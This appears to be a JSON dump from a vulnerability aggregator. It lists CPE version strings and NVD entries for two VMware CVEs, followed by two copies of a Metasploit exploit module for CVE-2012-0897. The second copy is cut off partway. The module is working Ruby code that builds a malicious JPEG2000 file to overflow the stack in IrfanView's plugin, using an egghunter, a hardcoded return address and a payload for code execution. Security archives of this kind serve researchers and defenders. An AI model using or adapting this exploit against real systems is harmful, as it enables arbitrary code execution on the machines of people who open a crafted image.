"cpe:2.3:a:irfanview:irfanview:3.25:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.00:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.00:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.28:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.99:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.98:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.66:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.32:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.90:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.22:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.10:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.23:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.36:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.97:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.50:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.97:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.07:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.97:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.27:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.90:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.70:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.12:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.22:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.85:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.65:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.68:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.60:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.95:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.40:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.98a:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.18:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.95:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.61:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.15:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.91:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.35:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.07:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.30:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.80:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.37:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.30:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.52:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.83:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.32:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.17:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.70:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.05:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.27:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.98:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.05:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.82:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.50:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.80:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.51:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.02:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.20:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.85:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.63:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.92:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.00:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.30:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.21:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.85:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.80:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.25:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.92:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.60:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.75:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.75:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.20:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.62:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.95:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.20:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.17:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "TPView.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 11.1.1, VMware Player 6.x before 6.0.6 and 7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to execute arbitrary code on the host OS via unspecified vectors, a different vulnerability than CVE-2012-0897.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2336", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2336"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2336", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2336", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "TPInt.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 11.1.1, VMware Player 6.x before 6.0.6 and 7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to execute arbitrary code on the host OS via unspecified vectors.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2337", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2337"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2337", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:12:56", "description": "", "published": "2012-07-02T00:00:00", "type": "packetstorm", "title": "Irfanview JPEG2000 4.3.2.0 jp2 Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0897"], "modified": "2012-07-02T00:00:00", "id": "PACKETSTORM:114409", "href": "https://packetstormsecurity.com/files/114409/Irfanview-JPEG2000-4.3.2.0-jp2-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Egghunter \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow vulnerability in \nversion <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been \ntested on a specific version of irfanview (v4.3.2), although other versions may \nwork also. The vulnerability is triggered via parsing an invalid qcd chunk \nstructure and specifying a malformed qcd size and data. \n \nPayload delivery and vulnerability trigger can be executed in multiple ways. \nThe user can double click the file, use the file dialog, open via the icon \nand drag/drop the file into Irfanview\\'s window. An egg hunter is used for \nstability. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery \n'mr_me <steventhomasseeley[at]gmail.com>', # msf-fu \n'juan vazquez' # more improvements \n], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2012-0897' ], \n[ 'OSVDB', '78333'], \n[ 'BID', '51426' ], \n[ 'URL', 'http://www.greyhathacker.net/?p=525' ], \n], \n'Platform' => [ 'win' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 4000, \n'DisableNops' => true, \n}, \n'Targets' => \n[ \n# push esp; retn [i_view32.exe] \n# http://www.oldapps.com/irfanview.php?old_irfanview=7097 \n# http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe \n[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ] \n], \n'DisclosureDate' => 'Jan 16 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']), \n], self.class) \nend \n \n# encode our string like unicode except we are not using nulls \ndef encode_bytes(raw_bytes) \nencoded_bytes = \"\" \n0.step(raw_bytes.length-1, 2) { |i| \nencoded_bytes << raw_bytes[i+1] \nencoded_bytes << raw_bytes[i] \n} \nreturn encoded_bytes \nend \n \ndef exploit \njp2 = \"\" \njp2 << \"\\x00\\x00\\x00\\x0c\" # \njp2 << \"\\x6a\\x50\\x20\\x20\" # [jP ] <0x6a502020> magic 0xd0a870a,len 12 \njp2 << \"\\x0d\\x0a\\x87\\x0a\" # \njp2 << \"\\x00\\x00\\x00\\x14\" # \njp2 << \"\\x66\\x74\\x79\\x70\" # \njp2 << \"\\x6a\\x70\\x32\\x20\" # \njp2 << \"\\x00\\x00\\x00\\x00\" # MinorVersion = 0 = [\\0\\0\\0\\0] \njp2 << \"\\x6a\\x70\\x32\\x20\" # Compat = 0x6a703220 = [jp2 ] \njp2 << \"\\x00\\x00\\x00\\x38\" # \njp2 << \"\\x75\\x75\\x69\\x64\" # [uuid] <0x75756964> len 56 data offset 8 \njp2 << \"\\x61\\x70\\x00\\xde\\xec\\x87\" # 56 bytes with start and end tags \njp2 << \"\\xd5\\x11\\xb2\\xed\\x00\\x50\" # \njp2 << \"\\x04\\x71\\xfd\\xdc\\xd2\\x00\" # \njp2 << \"\\x00\\x00\\x40\\x01\\x00\\x00\" # \njp2 << \"\\x00\\x00\\x00\\x00\\x60\\x09\" # \njp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" # \njp2 << \"\\x00\\x00\\x00\\x00\\x00\\x00\" # \njp2 << \"\\x00\\x00\\x30\\x00\\x00\\x00\" # \njp2 << \"\\x00\\x00\\x00\\x2d\" # \njp2 << \"\\x6a\\x70\\x32\\x68\" # [jp2h] <0x6a703268> len 45 data offset 8 \njp2 << \"\\x00\\x00\\x00\\x16\" # \njp2 << \"\\x69\\x68\\x64\\x72\" # [ihdr] <0x69686472> len 22 data offset 8 \njp2 << \"\\x00\\x00\\x00\\x0a\" # ImageHeight = 10 \njp2 << \"\\x00\\x00\\x00\\x0a\" # ImageWidth = 10 \njp2 << \"\\x00\\x03\" # NumberOfComponents = 3 \njp2 << \"\\x07\" # BitsPerComponent = 7 \njp2 << \"\\x07\" # Compression = 7 \njp2 << \"\\x01\" # Colorspace = 0x1 = unknown \njp2 << \"\\x00\\x00\\x00\\x00\\x0f\" # \njp2 << \"\\x63\\x6f\\x6c\\x72\" # [colr] <0x636f6c72> len 15 data offset 8 \njp2 << \"\\x01\" # Method = 1 \njp2 << \"\\x00\" # Precedence = 0 \njp2 << \"\\x00\" # ColorSpaceAproximation = 0 \njp2 << \"\\x00\\x00\\x00\" # EnumeratedColorSpace = 16 = sRGB \njp2 << \"\\x10\\x00\\x00\\x00\\x00\" # \njp2 << \"\\x6a\\x70\\x32\\x63\" # [jp2c] <0x6a703263> length 0 data offset 8 \njp2 << \"\\xff\\x4f\" # <0xff4f=JP2C_SOC> Start of codestream \njp2 << \"\\xff\\x51\" # <0xff51=JP2C_SIZ> length 47 \njp2 << \"\\x00\\x2f\" # 47 bytes \njp2 << \"\\x00\\x00\" # Capabilities = 0 \njp2 << \"\\x00\\x00\\x00\\x0a\" # GridWidth = 10 \njp2 << \"\\x00\\x00\\x00\\x0a\" # GridHeight = 10 \njp2 << \"\\x00\\x00\\x00\\x00\" # XImageOffset = 0 \njp2 << \"\\x00\\x00\\x00\\x00\" # YImageOffset = 0 \njp2 << \"\\x00\\x00\\x00\\x0a\" # TileWidth = 10 \njp2 << \"\\x00\\x00\\x00\\x0a\" # TileHeight = 10 \njp2 << \"\\x00\\x00\\x00\\x00\" # Xtileoffset = 0 \njp2 << \"\\x00\\x00\\x00\\x00\" # Ytileoffset = 0 \njp2 << \"\\x00\\x03\" # NumberOfComponents = 3 \njp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1 \njp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1 \njp2 << \"\\x07\\x01\\x01\" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1 \njp2 << \"\\xff\\x52\" # <0xff52=JP2C_COD> length 12 \njp2 << \"\\x00\\x0c\" # 12 bytes \njp2 << \"\\x00\" # codingStyle=0=entropy coder w/o partition \njp2 << \"\\x00\" # ProgressionOrder = 0 \njp2 << \"\\x00\\x05\" # NumberOfLayers = 0x5 \njp2 << \"\\x01\" # MultiComponentTransform=0x1=5/3 reversible \njp2 << \"\\x05\" # DecompLevels = 5 \njp2 << \"\\x04\" # CodeBlockWidthExponent=0x4+2 # cbw ->64 \njp2 << \"\\x04\" # CodeBlockHeightExponent=0x4+2 # cbh ->64 \njp2 << \"\\x00\" # CodeBLockStyle = 0 \njp2 << \"\\x00\" # QMIFBankId = 0 \n \neggoptions = \n{ \n:checksum => false, \n:eggtag => 'pwnd' \n} \n \nhunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) \nqcd_data = \"\" \nqcd_data << make_nops(10) \nqcd_data << encode_bytes(hunter) \nqcd_data << rand_text_alpha(146) \n \njmp_hunter = %q{ \njmp $-0xad \ninc ecx \n} \n \n# jump to our egghunter \njmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string \n \nqcd_data << encode_bytes(jmp_hunter) \nqcd_data << rand_text_alpha(196-qcd_data.length) \nqcd_data << encode_bytes([target.ret].pack(\"V\")) \n \n# align ecx and jmp \npivot = %q{ \ninc ch \njmp ecx \n} \n \npivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string \n \nqcd_data << encode_bytes(pivot) \nqcd_data << egg \n \njp2 << \"\\xff\\x5c\" # start \njp2 << \"\\x00\\xf5\" # arbitrary size to trigger overflow \njp2 << \"\\x22\" # guard \njp2 << qcd_data # malicious code \njp2 << \"\\xff\\x90\" # <0xff90=JP2C_SOT>len 10 \njp2 << \"\\x00\\x0a\" # 10 bytes \njp2 << \"\\x00\\x00\\x00\\x00\\x00\\x68\\x00\\x01\" \njp2 << \"\\xff\\x93\" # <0xff93=JP2C_SOD> Start of data \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\" \njp2 << \"\\x80\\x80\" \njp2 << \"\\xff\\xd9\" \n \n# Create the file \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(jp2) \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/114409/irfanview_jpeg2000_bof.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T12:02:41", "description": "Irfanview JPEG2000. CVE-2012-0897. Local exploit for windows platform", "published": "2012-07-01T00:00:00", "type": "exploitdb", "title": "Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0897"], "modified": "2012-07-01T00:00:00", "id": "EDB-ID:19519", "href": "https://www.exploit-db.com/exploits/19519/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Remote::Egghunter\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow vulnerability in\r\n\t\t\t\tversion <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been\r\n\t\t\t\ttested on a specific version of irfanview (v4.3.2), although other versions may\r\n\t\t\t\twork also. The vulnerability is triggered via parsing an invalid qcd chunk\r\n\t\t\t\tstructure and specifying a malformed qcd size and data.\r\n\r\n\t\t\t\tPayload delivery and vulnerability trigger can be executed in multiple ways.\r\n\t\t\t\tThe user can double click the file, use the file dialog, open via the icon\r\n\t\t\t\tand drag/drop the file into Irfanview\\'s window. An egg hunter is used for\r\n\t\t\t\tstability.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # msf-fu\r\n\t\t\t\t\t'juan vazquez' # more improvements\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-0897' ],\r\n\t\t\t\t\t[ 'OSVDB', '78333'],\r\n\t\t\t\t\t[ 'BID', '51426' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.greyhathacker.net/?p=525' ],\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'win' ],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4000,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# push esp; retn [i_view32.exe]\r\n\t\t\t\t\t# http://www.oldapps.com/irfanview.php?old_irfanview=7097\r\n\t\t\t\t\t# http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe\r\n\t\t\t\t\t[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 16 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\t# encode our string like unicode except we are not using nulls\r\n\tdef encode_bytes(raw_bytes)\r\n\t\tencoded_bytes = \"\"\r\n\t\t0.step(raw_bytes.length-1, 2) { |i|\r\n\t\t\tencoded_bytes << raw_bytes[i+1]\r\n\t\t\tencoded_bytes << raw_bytes[i]\r\n\t\t}\r\n\t\treturn 